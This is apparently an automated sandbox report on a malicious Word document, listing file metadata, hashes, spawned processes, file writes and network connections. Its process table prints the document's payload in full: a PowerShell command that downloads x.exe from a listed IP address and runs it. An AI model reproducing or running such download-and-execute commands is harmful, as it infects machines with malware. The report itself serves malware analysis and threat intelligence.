File name: | 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809.doc |
Full analysis: | https://app.any.run/tasks/6b944f07-4391-481d-9d77-1006830db269 |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 14:28:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: jnmnGw, Template: Normal, Last Saved By: Windows User, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Apr 13 13:19:00 2018, Last Saved Time/Date: Fri Apr 13 13:19:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 16BA8F5D604B4B9A366AE2D5B2107E68 |
SHA1: | 878F05A0DDC78DB92CD844B5D13BE93E7B25F343 |
SHA256: | 99EB1D90EB5F0D012F35FCC2A7DEDD2229312794354843637EBB7F40B74D0809 |
SSDEEP: | 6144:FvLzpvvAi+VLE5DnxWCDWSQB2Zye7+rXMl:pzpvv+pE5DxWskrX |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 11000 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:04:13 12:19:00 |
CreateDate: | 2018:04:13 12:19:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Windows User |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | jnmnGw |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2272 | powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDBEE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2272 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9W02G8ODAHV1KLBPG1SU.temp | — | |
MD5:— | SHA256:— | |||
2272 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:51D7E7D99167CC1BD7CB1B7CB431A0A9 | SHA256:25DBAB6DC2DB84F32583B7F9CE53B731AD34571B1550E65E76D6C9F6BCA27BAD | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809.doc | pgc | |
MD5:2642D29915AF570A3BF08B577508A729 | SHA256:84CA993CF8C3A6BB5725BDEDE6E1B5DE89CB9B14FBF3FCAAA5A743AEDB0FEEBF | |||
2272 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFce610.TMP | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2272 | powershell.exe | GET | — | 185.189.58.222:80 | http://185.189.58.222/x.exe | GB | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2272 | powershell.exe | 185.189.58.222:80 | — | — | GB | malicious |